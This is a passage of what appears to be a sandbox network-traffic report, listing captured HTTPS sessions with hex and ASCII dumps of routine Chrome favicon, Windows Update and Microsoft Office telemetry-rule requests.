            Server: ECAcc (lpl/EF06)
            X-CID: 11
            X-Ms-ApiVersion: Distribute 1.2
            X-Ms-Region: prod-weu-z1
            Cache-Control: public, max-age=201319
            Date: Thu, 21 Nov 2024 08:49:31 GMT
            Content-Length: 55
            Connection: close
            X-CID: 2
            2024-11-21 08:49:31 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.449745172.217.16.1324432472C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-11-21 08:49:31 UTC711OUTGET /s2/favicons?domain=idcom-france.com HTTP/1.1
            Host: www.google.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
            Sec-Fetch-Site: cross-site
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://voyages-moinschers.fr/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-11-21 08:49:31 UTC488INHTTP/1.1 301 Moved Permanently
            Location: https://t0.gstatic.com/faviconV2?client=SOCIAL&type=FAVICON&fallback_opts=TYPE,SIZE,URL&url=http://idcom-france.com&size=16
            Content-Type: text/html; charset=UTF-8
            X-Content-Type-Options: nosniff
            Date: Thu, 21 Nov 2024 08:49:31 GMT
            Expires: Thu, 21 Nov 2024 09:19:31 GMT
            Cache-Control: public, max-age=1800
            Server: sffe
            Content-Length: 336
            X-XSS-Protection: 0
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            Connection: close
            2024-11-21 08:49:31 UTC336INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 74 30 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 56 32 3f 63 6c 69 65 6e 74 3d 53 4f 43 49 41 4c 26 61 6d 70 3b 74 79 70 65 3d 46 41 56 49 43 4f 4e 26 61 6d 70 3b 66 61 6c 6c 62 61 63 6b 5f 6f 70 74 73 3d 54 59 50 45 2c
            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://t0.gstatic.com/faviconV2?client=SOCIAL&amp;type=FAVICON&amp;fallback_opts=TYPE,


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.449749172.202.163.200443
            TimestampBytes transferredDirectionData
            2024-11-21 08:49:36 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FxaYLMr2BrGNYub&MD=cahBY3f6 HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
            Host: slscr.update.microsoft.com
            2024-11-21 08:49:37 UTC560INHTTP/1.1 200 OK
            Cache-Control: no-cache
            Pragma: no-cache
            Content-Type: application/octet-stream
            Expires: -1
            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
            MS-CorrelationId: f23ead10-ffa0-400d-9aeb-1d41a109b0a5
            MS-RequestId: 860874ae-92fc-4941-8387-f8bcba6166ae
            MS-CV: NBz16AB/v0iUn5e2.0
            X-Microsoft-SLSClientCache: 2880
            Content-Disposition: attachment; filename=environment.cab
            X-Content-Type-Options: nosniff
            Date: Thu, 21 Nov 2024 08:49:36 GMT
            Connection: close
            Content-Length: 24490
            2024-11-21 08:49:37 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
            2024-11-21 08:49:37 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


            Session IDSource IPSource PortDestination IPDestination Port
            5192.168.2.44975713.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:13 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:13 UTC471INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:13 GMT
            Content-Type: text/plain
            Content-Length: 218853
            Connection: close
            Vary: Accept-Encoding
            Cache-Control: public
            Last-Modified: Tue, 19 Nov 2024 16:37:24 GMT
            ETag: "0x8DD08B87243495C"
            x-ms-request-id: b5254561-a01e-0070-0158-3b573b000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085013Z-1777c6cb754dqf99hC1TEB5nps0000000au0000000000kr2
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:13 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
            Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
            2024-11-21 08:50:14 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
            Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
            2024-11-21 08:50:14 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
            Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
            2024-11-21 08:50:14 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
            Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
            2024-11-21 08:50:14 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
            Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
            2024-11-21 08:50:14 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
            Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
            2024-11-21 08:50:14 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
            Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
            2024-11-21 08:50:14 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
            Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
            2024-11-21 08:50:14 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
            Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
            2024-11-21 08:50:14 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
            Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


            Session IDSource IPSource PortDestination IPDestination Port
            6192.168.2.44976213.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:16 UTC192OUTGET /rules/rule120100v3s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:16 UTC471INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:16 GMT
            Content-Type: text/xml
            Content-Length: 1000
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
            ETag: "0x8DC582BB097AFC9"
            x-ms-request-id: 7cc8893a-a01e-0084-68b1-3b9ccd000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085016Z-1777c6cb754whff4hC1TEBcd6c00000009eg00000000brtm
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:16 UTC1000INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 31 30 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 32 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 52 65 73 75 6d 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 49 20 54 3d 22 33 22 20 49 3d 22 33 30 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 35 22 3e
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120100" V="3" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <A T="2" E="TelemetryResume" /> <TI T="3" I="30s" /> <R T="4" R="120100" /> <TH T="5">


            Session IDSource IPSource PortDestination IPDestination Port
            7192.168.2.44975813.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:16 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:16 UTC494INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:16 GMT
            Content-Type: text/xml
            Content-Length: 3788
            Connection: close
            Vary: Accept-Encoding
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
            ETag: "0x8DC582BAC2126A6"
            x-ms-request-id: f909c6c7-c01e-0049-518c-3aac27000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085016Z-r1d97b99577hsvhhhC1TEByb1w00000004a000000000dtzx
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:16 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


            Session IDSource IPSource PortDestination IPDestination Port
            8192.168.2.44976113.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:16 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:16 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:16 GMT
            Content-Type: text/xml
            Content-Length: 450
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
            ETag: "0x8DC582BD4C869AE"
            x-ms-request-id: 704ea499-801e-00ac-498c-3bfd65000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085016Z-r1d97b99577dd2gchC1TEBz5ys00000009v000000000exwt
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
